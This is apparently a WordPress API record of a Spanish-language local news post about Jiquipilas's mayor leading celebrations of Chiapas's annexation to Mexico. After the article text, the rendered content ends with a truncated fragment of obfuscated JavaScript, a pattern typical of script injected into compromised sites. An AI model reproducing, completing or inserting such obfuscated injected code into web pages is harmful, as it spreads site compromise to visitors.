{"id":5144,"date":"2022-09-15T22:27:14","date_gmt":"2022-09-15T22:27:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5144"},"modified":"2022-09-15T22:27:14","modified_gmt":"2022-09-15T22:27:14","slug":"encabeza-hugo-lazaro-el-198-aniversario-de-la-anexion-de-chiapas-a-mexico-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5144","title":{"rendered":"Encabeza Hugo L\u00e1zaro el 198 aniversario de la anexi\u00f3n de Chiapas a M\u00e9xico en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220915-WA0019-1024x683.jpg\" alt=\"\" class=\"wp-image-5145\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220915-WA0019-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220915-WA0019-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220915-WA0019-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220915-WA0019.jpg 1500w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Con degustaci\u00f3n gastron\u00f3mica, danza folkl\u00f3rica y m\u00fasica de marimba dieron inicio los festejos del mes patrio.   <\/p>\n\n\n\n<p> \u2022  El edil agradeci\u00f3 la participaci\u00f3n a las y los alumnos de la EPAJ, maestros y ballet folcl\u00f3rico de la casa de la cultura y tzocoy etze por su participaci\u00f3n.   <\/p>\n\n\n\n<p>15 de Septiembre del 2022. Jiquipilas, Chiapas. \u2013 En el marco de los festejos del 198 aniversario de la anexi\u00f3n de Chiapas a M\u00e9xico, el edil jiquipilteco C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez, acompa\u00f1ado de su esposa Madely Montejo e integrantes del cuerpo edilicio encabezaron los festejos del mes patrio.  Durante su mensaje el alcalde se\u00f1al\u00f3, \u201cme da mucho el poder compartir con ustedes hoy 14 de septiembre esta celebraci\u00f3n del 198 aniversario de la anexi\u00f3n de Chiapas a M\u00e9xico de 1824, con la anexi\u00f3n nos convertimos en mexicanos y nos sintamos orgullosos de nuestras ra\u00edces\u201d.  Destac\u00f3 la participaci\u00f3n de los alumnos de la escuela preparatoria agropecuaria Jiquipilas, catedr\u00e1ticos y personal docente, adem\u00e1s de trabajadores del ayuntantamiento y DIF municipal por sumarse a estos festejos iniciando con una demostraci\u00f3n gastron\u00f3mica que nos representa a nivel nacional, estatal y municipal engalanando a nuestro bello Jiquipilas.  \u201cMe siento muy orgulloso de mis ra\u00edces y hoy podemos gritar con entusiasmo y algarab\u00eda, viva M\u00e9xico, viva Chiapas y viva Jiquipilas, es un d\u00eda muy importante porque desde el 14 de septiembre de 1824 las y los chiapanecos decidieron formar parte de esta hermosa republica que es M\u00e9xico\u201d, mencion\u00f3 el alcalde Hugo L\u00e1zaro.           Por \u00faltimo, el presidente agradeci\u00f3 a los integrantes del ballet folcl\u00f3rico de la casa de la cultura y tzocoy etze por alegrar a los asistentes, concluyendo con la participaci\u00f3n de la marimba orquesta municipal de Jiquipilas.  Acompa\u00f1aron al edil el s\u00edndico municipal, Alejandra S\u00e1nchez, los regidores Porfirio Gil, Abril Zebadua y Leopoldo Gald\u00e1mez, adem\u00e1s de directores de \u00e1rea, personal administrativo y ciudadan\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Con degustaci\u00f3n gastron\u00f3mica, danza folkl\u00f3rica y m\u00fasica de marimba dieron inicio los festejos del mes patrio. \u2022 El edil agradeci\u00f3 la participaci\u00f3n a las y los alumnos de la EPAJ, maestros y ballet folcl\u00f3rico de la casa de la cultura y tzocoy etze por su participaci\u00f3n. 15 de Septiembre del 2022. Jiquipilas, Chiapas. \u2013 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5145,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5144","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5144"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5144\/revisions"}],"predecessor-version":[{"id":5146,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5144\/revisions\/5146"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5145"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5144"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}